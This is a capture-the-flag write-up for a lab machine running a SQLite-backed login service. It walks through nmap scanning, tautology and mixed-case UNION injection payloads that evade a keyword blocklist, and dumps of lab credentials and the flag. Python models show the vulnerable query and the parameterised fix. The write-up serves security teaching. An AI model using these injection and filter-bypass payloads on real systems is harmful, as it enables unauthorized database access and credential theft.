Lightroom
Scanning
# Nmap 7.94SVN scan initiated Thu Jan 30 15:28:56 2025 as: nmap -sC -sV -oA namp -p- 10.10.97.2
Nmap scan report for 10.10.97.2
Host is up (0.040s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 61:c5:06:f2:4a:20:5b:cd:09:4d:72:b0:a5:aa:ce:71 (RSA)
| 256 51:e0:5f:fa:81:64:d3:d9:26:24:16:ca:45:94:c2:00 (ECDSA)
|_ 256 77:e1:36:3b:95:9d:e0:3e:0a:56:82:b2:9d:4c:fe:1a (ED25519)
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
| Welcome to the Light database!
| Please enter your username:
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest:
| Welcome to the Light database!
| Please enter your username: Username not found.
|_ Please enter your username:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.94SVN%I=7%D=1/30%Time=679BE12E%P=x86_64-pc-linux-gnu%r
SF:(NULL,3B,"Welcome\x20to\x20the\x20Light\x20database! Please\x20enter\x
SF:20your\x20username:\x20")%r(GenericLines,6B,"Welcome\x20to\x20the\x20Li
SF:ght\x20database! Please\x20enter\x20your\x20username:\x20Username\x20n
SF:ot\x20found\. Please\x20enter\x20your\x20username:\x20")%r(GetRequest,
SF:6B,"Welcome\x20to\x20the\x20Light\x20database! Please\x20enter\x20your
SF:\x20username:\x20Username\x20not\x20found\. Please\x20enter\x20your\x2
SF:0username:\x20")%r(HTTPOptions,6B,"Welcome\x20to\x20the\x20Light\x20dat
SF:abase! Please\x20enter\x20your\x20username:\x20Username\x20not\x20foun
SF:d\. Please\x20enter\x20your\x20username:\x20")%r(RTSPRequest,6B,"Welco
SF:me\x20to\x20the\x20Light\x20database! Please\x20enter\x20your\x20usern
SF:ame:\x20Username\x20not\x20found\. Please\x20enter\x20your\x20username
SF::\x20")%r(RPCCheck,3B,"Welcome\x20to\x20the\x20Light\x20database! Plea
SF:se\x20enter\x20your\x20username:\x20")%r(DNSVersionBindReqTCP,3B,"Welco
SF:me\x20to\x20the\x20Light\x20database! Please\x20enter\x20your\x20usern
SF:ame:\x20")%r(DNSStatusRequestTCP,3B,"Welcome\x20to\x20the\x20Light\x20d
SF:atabase! Please\x20enter\x20your\x20username:\x20")%r(Help,6B,"Welcome
SF:\x20to\x20the\x20Light\x20database! Please\x20enter\x20your\x20usernam
SF:e:\x20Username\x20not\x20found\. Please\x20enter\x20your\x20username:\
SF:x20")%r(SSLSessionReq,3B,"Welcome\x20to\x20the\x20Light\x20database! P
SF:lease\x20enter\x20your\x20username:\x20")%r(TerminalServerCookie,3B,"We
SF:lcome\x20to\x20the\x20Light\x20database! Please\x20enter\x20your\x20us
SF:ername:\x20")%r(TLSSessionReq,3B,"Welcome\x20to\x20the\x20Light\x20data
SF:base! Please\x20enter\x20your\x20username:\x20")%r(Kerberos,3B,"Welcom
SF:e\x20to\x20the\x20Light\x20database! Please\x20enter\x20your\x20userna
SF:me:\x20")%r(SMBProgNeg,3B,"Welcome\x20to\x20the\x20Light\x20database!
SF:Please\x20enter\x20your\x20username:\x20")%r(X11Probe,3B,"Welcome\x20to
SF:\x20the\x20Light\x20database! Please\x20enter\x20your\x20username:\x20
SF:")%r(FourOhFourRequest,6B,"Welcome\x20to\x20the\x20Light\x20database!
SF:Please\x20enter\x20your\x20username:\x20Username\x20not\x20found\. Ple
SF:ase\x20enter\x20your\x20username:\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 30 15:32:09 2025 -- 1 IP address (1 host up) scanned in 192.67 seconds
I have two services: SSH on port 22 and an unknown service on 1337/tcp. The next step is to enumerate each of them with a lot of patience. My first scan was a standard scan, nmap -sC -sV -oN nmap 10.10.97.2, but it revealed only port 22 (SSH), so I ran a more comprehensive scan adding the -p- flag to cover all 65535 TCP ports.
Enumeration
The only port worth enumerating at this stage is 1337; additionally, the challenge gives me some information about how to interact with this service:
You can connect to it using nc MACHINE_IP 1337. You can use the username smokey in order to get started.
Once connected, the first thing I see is a banner saying "Welcome to the Light database!", which feels like a hint... The next prompt asks me to enter a username.
$ nc 10.10.37.110 1337
Welcome to the Light database!
Please enter your username:
As suggested by the challenge description, entering the username smokey returns that user's password.
$ nc 10.10.37.110 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username:
Now that I know how to interact with the service I need to exploit it, and the only attack that came to mind while doing the box was SQL injection (SQLi). Searching Google for "lightweight database" gives a list of lightweight databases, and one in particular catches my interest: SQLite.
I was not able to verify at this point that the backend really was SQLite, so I proceeded on that assumption and used SQLite's system tables and schema, hoping it would work. If it didn't, I would have to try a different one...
My first attempt used the example SQL injection payloads listed on Wikipedia:
' OR '1'='1' --
' OR '1'='1' {
' OR '1'='1' /*
Entering the first payload produced the error message "For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)", so my first idea was to drop the "--", which is the comment marker. Now the application gives a different error: "Error: unrecognized token: "'1'' LIMIT 30"".
Please enter your username: smokey ' or '1' = '1' --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: smokey ' or '1' = '1'
Error: unrecognized token: "'1'' LIMIT 30"
Please enter your username:
At this point I can try to guess how the original query is executed behind the scenes:
SELECT [columnName] FROM [tableName] WHERE [columnName] = '[userinput]' LIMIT 30
where columnName could be something like user, username or just name.
The error was caused by the trailing single quote in my input: the application appends its own closing quote right after the input, so my quote and its quote end up adjacent ('') which SQLite reads as an escaped quote inside a string literal, and that literal then runs to the end of the query without ever closing. SQLite reports the unterminated text, '1'' LIMIT 30, as an unrecognized token. For this example, let's assume the column is called username and the table users.
That extra quote was what gave me the syntax error, so to make the payload syntactically correct I have to remove it and let the application's own quote close the string.
Please enter your username: smokey ' or '1' = '1
Password: tF8tj2o94WE4LKC
Now it works, with no syntax error. But why does it work?
Time to retrieve the admin's password, assuming there is an admin user. Let's test and see what the application says; it may give me more information about the application's behaviour.
It still gives me the same password!
Please enter your username: admin ' or '1' = '1
Password: tF8tj2o94WE4LKC
This is because the WHERE clause is now true for every row: username = 'admin ' does not match anything, but '1' = '1' is always true, and FALSE OR TRUE is TRUE. The query therefore returns every row in the table and the application displays only the first one. That is why both payloads return the same password, tF8tj2o94WE4LKC, which is not even smokey's (that was vYQ5ngPpw8AdUmL): it belongs to whichever row happens to come first in the table.
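To make the reconstructed query concrete, here is a small Python model of the vulnerable lookup, added for this writeup and not the room's own code. It builds an in-memory SQLite table with constructed rows, runs the reconstructed query with the input pasted into the SQL string exactly as the error message suggests the service does, and shows the parameterised version that closes the hole. The table name users, the column names and every row value are assumptions; only the shape WHERE ... = '<input>' LIMIT 30 is inferred from the page.

```python
import sqlite3

# Constructed sample table. The table name (users), the column names and the row
# contents are assumptions for this example; tF8tj2o94WE4LKC is given to whichever
# row comes first because that is what the tautology payload returned in the room.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("first_row_user", "tF8tj2o94WE4LKC"),   # username made up for the example
         ("smokey", "vYQ5ngPpw8AdUmL")],
    )
    return con

def vulnerable_lookup(con, user_input):
    """The reconstructed query: user input is pasted into the SQL string, so a quote
    in the input ends the string literal and the rest is parsed as SQL. Like the
    service, this shows only the first row that comes back."""
    query = f"SELECT password FROM users WHERE username = '{user_input}' LIMIT 30"
    try:
        row = con.execute(query).fetchone()
    except sqlite3.OperationalError as err:
        return f"Error: {err}"   # e.g. Error: unrecognized token: "'1'' LIMIT 30"
    return f"Password: {row[0]}" if row else "Username not found."

def safe_lookup(con, user_input):
    """Same lookup with a bound parameter: the input is only ever a value, never SQL."""
    row = con.execute(
        "SELECT password FROM users WHERE username = ? LIMIT 30", (user_input,)
    ).fetchone()
    return f"Password: {row[0]}" if row else "Username not found."

if __name__ == "__main__":
    con = make_db()
    for payload in ("smokey",
                    "smokey ' or '1' = '1'",   # trailing quote: unterminated literal
                    "smokey ' or '1' = '1",    # application's quote closes it: tautology
                    "admin ' or '1' = '1"):    # user does not exist, still the first row
        print(f"{payload!r:32} vulnerable -> {vulnerable_lookup(con, payload)}")
        print(f"{'':32} safe       -> {safe_lookup(con, payload)}")
```

The tautology payloads return the first row's password from the vulnerable lookup regardless of which username they start with, while the parameterised lookup answers "Username not found." for every one of them, because the whole input is compared as a literal value.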
At this point I have to try different types of SQL injection. Searching Google for the types of SQL injection, and drawing on experience, I can tell the most suitable type here is UNION-based SQL injection, since the query's result is echoed straight back to me.
I tried several UNION-based payloads, and none of them worked because of the input check.
Please enter your username: ' or 1=1; --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: admin SELECT * FROM all_tables
Ahh there is a word in there I don't like :(
Please enter your username: admin ' or UNION ALL SELECT NULL,version()--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: admin ' UNION ALL SELECT NULL,version()
Ahh there is a word in there I don't like :(
After a few tries, and some luck, I understood that the filter is a case-sensitive blocklist of SQL keywords: SELECT and UNION are rejected in all-uppercase and all-lowercase form, but mixed-case spellings such as Select or uNion pass straight through, and because SQLite treats keywords case-insensitively they still execute.
Now I need more information about the database instead of guessing table and column names.
Searching for SQLite system tables I found the following:
SQLite: System Tables

| System Table | Description |
|---|---|
| sqlite_master | Master listing of all database objects in the database and the SQL used to create each object. |
| sqlite_sequence | Lists the last sequence number used for the AUTOINCREMENT column in a table. The sqlite_sequence table is only created once an AUTOINCREMENT column has been defined in the database and at least one sequence number value has been generated and used. |
| sqlite_stat1 | Created by the ANALYZE command to store statistical information about the tables and indexes analysed; this information is later used by the query optimizer. |

SQLite Master Table: sqlite_master

| Column Name | Description |
|---|---|
| type | The type of database object, such as table, index, trigger or view. |
| name | The name of the database object. |
| tbl_name | The table name that the database object is associated with. |
| rootpage | Root page. |
| sql | SQL used to create the database object. |
Now I can enumerate the tables in this database and the SQL used to create each of them:
Please enter your username: smokey ' Union Select tbl_name From sqlite_master Where type='table
Password: admintable
Please enter your username: smokey ' Union Select sql From sqlite_master Where type='table
Password: CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
Now that I know the structure of this table I can craft specific queries to extract the information in it.
Exploitation
After a few tries I came up with the following query to print the admin's username, which answers the first question.
Please enter your username: smokey ' uNIon Select username fRom admintable WHere username Like '%
Password: TryHackMeAdmin
Q: What is the admin username?
A: TryHackMeAdmin
Having confirmed the table and column names, I can craft the query to extract the password:
Please enter your username: smokey ' uNIon Select password fRom admintable WHere username='TryHackMeAdmin
Password: mamZtAuMlrsEy5bp6q17
Q: What is the password to the username mentioned in question 1?
A: mamZtAuMlrsEy5bp6q17
To extract the flag, after many more attempts with random queries, I decided to print out everything in the table using LIKE '%' instead of matching exactly on the username; I was tired of extracting exactly one password. Why focus on extracting one password when I can pull every row in the table? The application still shows only one row, and this time the row that came back first was the one holding the flag rather than the admin's password.
Please enter your username: smokey ' uNIon Select password fRom admintable WHere password Like '%
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
Q: What is the flag?
A: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
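The keyword filter, its mixed-case bypass and the UNION queries used above, as a Python model added for this writeup (not the room's code). The two-table layout is an assumption: users, holding smokey, stands in for the table the service actually queries (the page never reveals its name), while admintable uses the CREATE statement the sqlite_master query returned; every row value is constructed, and the username of the row carrying the flag is made up. The filter reproduces only the observed behaviour: the three rejected substrings and a case-sensitive check for SELECT and UNION in upper and lower case. query_rows returns everything the injected query yields, which shows what the service's single-row display hides.

```python
import sqlite3

# Constructed sample database. `users` (with smokey) is an assumed stand-in for the
# table the service really queries; `admintable` uses the CREATE statement the
# sqlite_master enumeration returned. Every row value here is made up.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('smokey', 'vYQ5ngPpw8AdUmL')")
    con.execute("CREATE TABLE admintable (id INTEGER PRIMARY KEY, username TEXT, password INTEGER)")
    con.executemany(
        "INSERT INTO admintable (username, password) VALUES (?, ?)",
        [("TryHackMeAdmin", "mamZtAuMlrsEy5bp6q17"),
         ("flagholder", "THM{SQLit3_InJ3cTion_is_SimplE_nO?}")],   # username made up
    )
    return con

BLOCKED_FRAGMENTS = ("/*", "--", "%0b")
# Observed: SELECT/select and UNION/union are rejected, Select and uNion pass, so the
# keyword check is modelled as a plain case-sensitive substring match. The real
# blocklist may hold more words than the writeup uncovered.
BLOCKED_WORDS = ("SELECT", "select", "UNION", "union")

def input_filter(user_input):
    """Return the service's rejection message, or None if the input gets through."""
    if any(fragment in user_input for fragment in BLOCKED_FRAGMENTS):
        return "For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)"
    if any(word in user_input for word in BLOCKED_WORDS):
        return "Ahh there is a word in there I don't like :("
    return None

def query_rows(con, user_input):
    """Every value the injected query yields; the real service shows only the first."""
    rejected = input_filter(user_input)
    if rejected:
        raise ValueError(rejected)
    # Reconstructed vulnerable query: the input is pasted straight into the SQL.
    query = f"SELECT password FROM users WHERE username = '{user_input}' LIMIT 30"
    return [row[0] for row in con.execute(query).fetchall()]

def service_reply(con, user_input):
    """What the port 1337 service prints for one line of input."""
    try:
        rows = query_rows(con, user_input)
    except ValueError as rejected:
        return str(rejected)
    except sqlite3.OperationalError as err:
        return f"Error: {err}"
    return f"Password: {rows[0]}" if rows else "Username not found."

# Payloads from the writeup: the keywords are spelled in mixed case to slip past the filter.
TABLES    = "smokey ' uNIon Select tbl_name From sqlite_master Where type='table"
SCHEMA    = "smokey ' uNIon Select sql From sqlite_master Where type='table"
USERNAMES = "smokey ' uNIon Select username fRom admintable WHere username Like '%"
ADMIN_PW  = "smokey ' uNIon Select password fRom admintable WHere username='TryHackMeAdmin"
DUMP_PW   = "smokey ' uNIon Select password fRom admintable WHere password Like '%"

if __name__ == "__main__":
    con = make_db()
    print(service_reply(con, "smokey ' or '1' = '1' --"))          # substring filter
    print(service_reply(con, "smokey ' UNION Select password fRom admintable WHere '1'='1"))  # keyword filter
    for payload in (TABLES, SCHEMA, USERNAMES, ADMIN_PW, DUMP_PW):
        print(repr(payload))
        print("  service shows:", service_reply(con, payload))
        print("  query returns:", query_rows(con, payload))
```

The base query matches nothing (the username is 'smokey ' with a trailing space), so everything the service prints comes from the UNIONed SELECT; since the display is limited to one row, the value shown for LIKE '%' payloads is whichever row SQLite hands back first, which is why the dump of password can surface the flag instead of the admin's password. A case-sensitive keyword blocklist like this one is no defence at all; the fix is to bind the input as a parameter rather than splice it into the query.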